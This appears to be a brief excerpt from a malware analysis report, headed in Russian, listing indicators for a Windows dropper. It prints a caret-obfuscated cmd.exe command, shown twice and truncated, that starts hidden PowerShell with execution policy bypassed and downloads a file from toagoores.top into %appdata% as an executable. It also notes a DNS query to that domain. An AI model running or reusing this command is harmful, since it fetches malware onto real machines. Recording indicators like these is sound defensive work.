Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^rS^HEll^.E^Xe -eXEC^U^Ti^oNpoLI^cy ^B^YPASS ^-NO^prOf^IlE -WI^Nd^OwSt^yL^e ^Hidd^EN^ (^neW-O^BjeC^T ^sYs^T^E^M^.ne^t.^W^EB^CLIENt).^dOWN^LO^ad^fI^le('http://toagoores.to...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^rS^HEll^.E^Xe -eXEC^U^Ti^oNpoLI^cy ^B^YPASS ^-NO^prOf^IlE -WI^Nd^OwSt^yL^e ^Hidd^EN^ (^neW-O^BjeC^T ^sYs^T^E^M^.ne^t.^W^EB^CLIENt).^dOWN^LO^ad^fI^le('http://toagoores.to...' (со скрытым окном)